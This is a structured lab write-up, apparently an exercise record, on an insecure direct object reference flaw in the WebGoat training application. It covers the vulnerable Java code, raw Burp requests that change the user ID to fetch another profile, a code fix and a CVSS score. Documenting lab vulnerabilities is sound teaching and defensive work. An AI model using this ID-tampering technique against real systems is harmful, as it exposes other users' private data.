## Version 1.4.1
## language: en

Feature:
  TOE:
    WebGoat
  Category:
    Access Control Flaws
  Location:
    Goat/IDOR/profile/userId - userId (Parameter)
  CWE:
    CWE-639: Authorization Bypass Through User-Controlled Key
  Goal:
    View another user's profile
  Recommendation:
    Don't rely in user input for authorization

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running WebGoat on http://localhost

  Scenario: Normal use case
    Given I go to WebGoat/start.mvc#lesson/IDOR.lesson/4
    And I click on View profile
    Then I see my user data displayed

  Scenario: Static detection
  Using request input for authorization
    Given I check the code at
    """
    webgoat-lessons/idor/src/main/java/org/owasp/webgoat/plugin/
    IDORViewOtherProfile.java
    """
    And I see
    """
    58  public AttackResult completed(@PathVariable("userId") String userId,
        HttpServletResponse resp) {
    59    Map<String,Object> details = new HashMap<>();
    60
    61   if (userSessionData.getValue("idor-authenticated-as").equals("tom")) {
    62        //going to use session auth to view this one
    63        String authUserId = (String)userSessionData.getValue("idor-authent
              icated-user-id");
    64        if(userId != null && !userId.equals(authUserId)) {
    65            //on the right track
    67            UserProfile requestedProfile = new UserProfile(userId);
    68            // secure code would ensure there was a horizontal access cont
                  rol check prior to dishing up the requested profile
    69            if (requestedProfile.getUserId().equals("2342388")){
    70                return trackProgress(success().feedback("idor.view.profile
        .success").output(requestedProfile.profileToMap().toString()).build());
    71            } else {
    72                return trackProgress(failed().feedback("idor.view.profile.
                      close1").build());
    73            }
    74        } else {
    75            return trackProgress(failed().feedback("idor.view.profile.
                  close2").build());
    76        }
    77    }
    78    return trackProgress(failed().build());
    79  }
    """
    Then I notice it's using a request parameter to decide which profile to show
    Then I know it's vulnerable to IDOR

  Scenario: Dynamic detection
  Detecting IDOR
    Given I intercept a GET request with Burp
    """
    GET /WebGoat/IDOR/profile/2342384 HTTP/1.1
    Host: 127.0.0.1:8000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/
    65.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1:8000/WebGoat/start.mvc
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Connection: close
    Cookie: JSESSIONID=01C45E8AAFB5480CCF6B6A141C7A39C0; BEEFHOOK=sPHOtf4WZ9fRh2
    UjERRZ6BnmNPJLA6QodYTIyeHINl2ARB9X8B15XTd3ZITqq7CWMczxQSjSeGdfc9De
    """
    And I get my user data
    """
    {role=3, color=silver, size=large, name=tom, userId=2342334}
    """
    Then this endpoint might be vulnerable to IDOR

  Scenario: Exploitation
  Getting another users information
    Given I know the target is vulnerable to IDOR
    Then I make a request for another user's data with Burp
    """
    GET /WebGoat/IDOR/profile/2342388 HTTP/1.1
    Host: 127.0.0.1:8000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/
    65.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1:8000/WebGoat/start.mvc
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Connection: close
    Cookie: JSESSIONID=01C45E8AAFB5480CCF6B6A141C7A39C0; BEEFHOOK=sPHOtf4WZ9fRh2
    UjERRZ6BnmNPJLA6QodYTIyeHINl2ARB9X8B15XTd3ZITqq7CWMczxQSjSeGdfc9De
    """
    Then I get the other user's information
    """
    HTTP/1.1 200
    X-Application-Context: application:8000
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    X-Frame-Options: DENY
    Content-Type: application/json;charset=UTF-8
    Date: Wed, 02 Jan 2019 17:09:26 GMT
    Connection: close
    Content-Length: 177

    {
      "lessonCompleted" : true,
      "feedback" : "Well done, you found someone else's profile",
      "output" : "{role=3, color=brown, size=large, name=Buffalo Bill,
      userId=2342388}"
    }
    """
    Then I have succesfully exploited this vulnerability

  Scenario: Remediation
  Check that the ID in the request is the same as the logged in user
    Given I patch the code as follows
    """
    58  public AttackResult completed(@PathVariable("userId") String userId,
        HttpServletResponse resp) {
    59    Map<String,Object> details = new HashMap<>();
    60
    61   if (userSessionData.getValue("idor-authenticated-as").equals("tom")) {
    62        //going to use session auth to view this one
    63        String authUserId = (String)userSessionData.getValue("idor-authent
              icated-user-id");
    64        if(userId != null && userId.equals(authUserId)) {
    65            //on the right track
    67            UserProfile requestedProfile = new UserProfile(userId);
    """
    Then I cannot access user data that is not my own anymore.

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    6.5/10 (Medium) - AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.0/10 (Medium) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    6.3/10 (Medium) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-01-02
